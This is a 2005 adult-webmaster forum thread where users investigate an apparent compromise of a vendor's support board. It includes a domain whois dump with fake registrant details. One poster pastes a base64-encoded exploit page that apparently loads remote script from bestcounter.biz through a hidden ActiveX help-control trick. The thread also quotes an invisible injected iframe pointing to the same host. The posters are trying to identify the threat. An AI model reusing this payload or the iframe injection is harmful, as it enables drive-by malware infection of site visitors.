Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Closed Thread

Register GFY Rules Calendar Mark Forums Read
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 06-12-2005, 04:33 PM   #1
fuzzypeach
Confirmed User
 
Join Date: May 2005
Posts: 392
Exploit at Choker's forum?



This thing pops up at the main forum with each and every reload... is it an exploit or sth bad?

Somehow, when a file with the name newEXPL tries to load, it doesn't conjure good thoughts.
__________________
Sig too big!
fuzzypeach is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 04:48 PM   #2
JD
Too lazy to set a custom title
 
Industry Role:
Join Date: Sep 2003
Posts: 22,651
Quote:
Originally Posted by fuzzypeach


This thing pops up at the main forum with each and every reload... is it an exploit or sth bad?

Somehow, when a file with the name newEXPL tries to load, it doesn't conjure good thoughts.
siggy sig sig
JD is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 04:51 PM   #3
Theo
HAL 9000
 
Industry Role:
Join Date: May 2001
Posts: 34,515
sleazy hacked him!
Theo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 04:57 PM   #4
fuzzypeach
Confirmed User
 
Join Date: May 2005
Posts: 392
PS: Can you install TTT in a subdirectory?

Example: www.yourdomain.com/traffic/
__________________
Sig too big!
fuzzypeach is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 05:03 PM   #5
jimmyf
OU812
 
Join Date: Feb 2001
Location: California
Posts: 12,651
He been fucking with someone from Haiti
newexpl.zip
http://bestcounter.biz

[DOMAIN whois information for BESTCOUNTER.BIZ ]
Domain Name: BESTCOUNTER.BIZ
Namespace: ICANN Unsponsored Generic TLD - http://www.icann.org
TLD Info: See IANA Whois - http://www.iana.org/root-whois/biz.htm
Registry: NeuLevel - http://www.neulevel.biz
Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM) - http://www.directi.com
Whois Server: whois.biz
Name Server[from whois+dns, dns ip]: NS2.BESTCOUNTER.BIZ 195.95.218.172
Name Server[from whois+dns, dns ip]: NS1.BESTCOUNTER.BIZ 195.95.218.170
Status: ok
Creation Date: Mon Jan 31 21:47:30 GMT 2005
Expiration Date: Tue Jan 30 23:59:59 GMT 2007
Updated Date: Fri Jun 03 02:20:05 GMT 2005
[whois.biz]
Domain Name: BESTCOUNTER.BIZ
Domain ID: D8873108-BIZ
Sponsoring Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM)
Sponsoring Registrar IANA ID: 303
Domain Status: ok
Registrant ID: DI_343543
Registrant Name: Vasiliy Pupkin
Registrant Organization: Online service
Registrant Address1: Bolshaya street
Registrant City: Lumumba
Registrant State/Province: None USA resident
Registrant Postal Code: 123456
Registrant Country: Haiti
Registrant Country Code: HT
Registrant Phone Number: +1.23456789
Registrant Email: [email protected]
Administrative Contact ID: DI_343543
Administrative Contact Name: Vasiliy Pupkin
Administrative Contact Organization: Online service
Administrative Contact Address1: Bolshaya street
Administrative Contact City: Lumumba
Administrative Contact State/Province: None USA resident
Administrative Contact Postal Code: 123456
Administrative Contact Country: Haiti
Administrative Contact Country Code: HT
Administrative Contact Phone Number: +1.23456789
Administrative Contact Email: [email protected]
Billing Contact ID: DI_343543
Billing Contact Name: Vasiliy Pupkin
Billing Contact Organization: Online service
Billing Contact Address1: Bolshaya street
Billing Contact City: Lumumba
Billing Contact State/Province: None USA resident
Billing Contact Postal Code: 123456
Billing Contact Country: Haiti
Billing Contact Country Code: HT
Billing Contact Phone Number: +1.23456789
Billing Contact Email: [email protected]
Technical Contact ID: DI_343543
Technical Contact Name: Vasiliy Pupkin
Technical Contact Organization: Online service
Technical Contact Address1: Bolshaya street
Technical Contact City: Lumumba
Technical Contact State/Province: None USA resident
Technical Contact Postal Code: 123456
Technical Contact Country: Haiti
Technical Contact Country Code: HT
Technical Contact Phone Number: +1.23456789
Technical Contact Email: [email protected]
Name Server: NS2.BESTCOUNTER.BIZ
Name Server: NS1.BESTCOUNTER.BIZ
Created by Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM)
Last Updated by Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM)
Domain Registration Date: Mon Jan 31 21:47:30 GMT 2005
Domain Expiration Date: Tue Jan 30 23:59:59 GMT 2007
Domain Last Updated Date: Fri Jun 03 02:20:05 GMT 2005
__________________
Epic CashEpic Cash works for me
Solar Cash Paysite Plugin
Gallery of the day freesites,POTD,Gallery generator with free hosting
jimmyf is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 05:40 PM   #6
fuzzypeach
Confirmed User
 
Join Date: May 2005
Posts: 392
Lol, the contents of that PHP file are below... looks like a mailer of some sorts, but what do I know?

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE 1MIDQuMCBUcmFuc2l0aW9uYWwvL0VOIj4KPEhUTUw+PEJPRFk+ CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZH F3ZSIgY2xhc3NpZD0iY2xzaWQ6YWRiODgwYTYtZDhmZi0xMWNm LTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9IkNvbW 1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+CjxQ QVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UE FSQU0gbmFtZT0iV2luZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFu ayI+CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbm Q7bXMtaXRzOmM6L3dpbmRvd3MvaGVscC9udHNoYXJlZC5jaG06 Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4KPC 9PQkpFQ1Q+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIg aWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNsc2lkOmFkYjg4MGE2LW Q4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+CjxQQVJBTSBu YW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE 1FTlUiPgo8UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4 dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRvdyIgdmFsdWU9IiRnbG 9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVl PSdjb21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3 VtZW50LndyaXRlKFwiPHNjcmlwdCBzcmM9aHR0cDovL2Jlc3Rj b3VudGVyLmJpei9kbC9hZHY0MzkvSlFUbXVkSS5qcGdcIitTdH JpbmcuZnJvbUNoYXJDb2RlKDYyKStcIjwvc2NyXCIrXCJpcHRc IitTdHJpbmcuZnJvbUNoYXJDb2RlKDYyKSkiKSc+CjwvT0JKRU NUPgo8c2NyaXB0PmFzZHF3ZS5ISENsaWNrKCk7c2V0VGltZW91 dCgiYXNkcXdlci5ISENsaWNrKCkiLDEwMCk7c2V0VGltZW91dC giZG9jdW1lbnQud3JpdGUoJycpIiwyMDApPC9zY3JpcHQ+PC9C T0RZPjwvSFRNTD4=
__________________
Sig too big!
fuzzypeach is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 06:30 PM   #7
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
i dont see anything . what url are you viewing..? you might be infected.
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 06:38 PM   #8
swedguy
Confirmed User
 
Industry Role:
Join Date: Jan 2002
Posts: 7,981
EDIT. deleted the url since I don't wanna get banned for posting the url to another board.
swedguy is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 06:50 PM   #9
RightHandMan
Confirmed User
 
Join Date: Jul 2003
Location: Ohio
Posts: 1,694
wrong thread....
__________________
RightHandMan is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 07:31 PM   #10
fuzzypeach
Confirmed User
 
Join Date: May 2005
Posts: 392
Quote:
Originally Posted by SmokeyTheBear
i dont see anything . what url are you viewing..? you might be infected.
I'm assuming that w w w . c h i c k e n b o a r d . c o m is choker's support board for TTT...

And I'm sure it's from his site coz it's hardcoded into the HTML! Just view the source... it's hidden at the bottom near the copyrights.

<span class="genmed">Support for http://www.betterbeup.com<iframe src="http://bestcounter.biz/dl/adv439.php" width=0 height=0 style="display:none"></iframe></span>
__________________
Sig too big!
fuzzypeach is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 07:36 PM   #11
s9ann0
Confirmed User
 
Join Date: Sep 2001
Location: Boston
Posts: 4,873
is this a drama thread?
s9ann0 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 07:54 PM   #12
Crypt
Confirmed User
 
Join Date: Apr 2004
Posts: 2,225
This russian sponsor will prolly change the url for stats one day ... for months we can look into their pannel

Stats
Crypt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 08:27 PM   #13
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
Quote:
Originally Posted by fuzzypeach
I'm assuming that w w w . c h i c k e n b o a r d . c o m is choker's support board for TTT...

And I'm sure it's from his site coz it's hardcoded into the HTML! Just view the source... it's hidden at the bottom near the copyrights.

<span class="genmed">Support for http://www.betterbeup.com<iframe src="http://bestcounter.biz/dl/adv439.php" width=0 height=0 style="display:none"></iframe></span>
Im not seeing that . thats the first thing i looked for "iframe"
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 08:29 PM   #14
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
hmm wait now i do see it on the main page.. strange it wasnt there the first 2 times i checked.. well choker is hacked then
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Old 06-12-2005, 08:38 PM   #15
S P A N N O W
Everywhere You Wanna Be!
 
Industry Role:
Join Date: Mar 2004
Location: NorCal
Posts: 11,941
You guys know better than this...

__________________
S P A N N O W is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook
Post New Thread Closed Thread
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks
Thread Tools



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.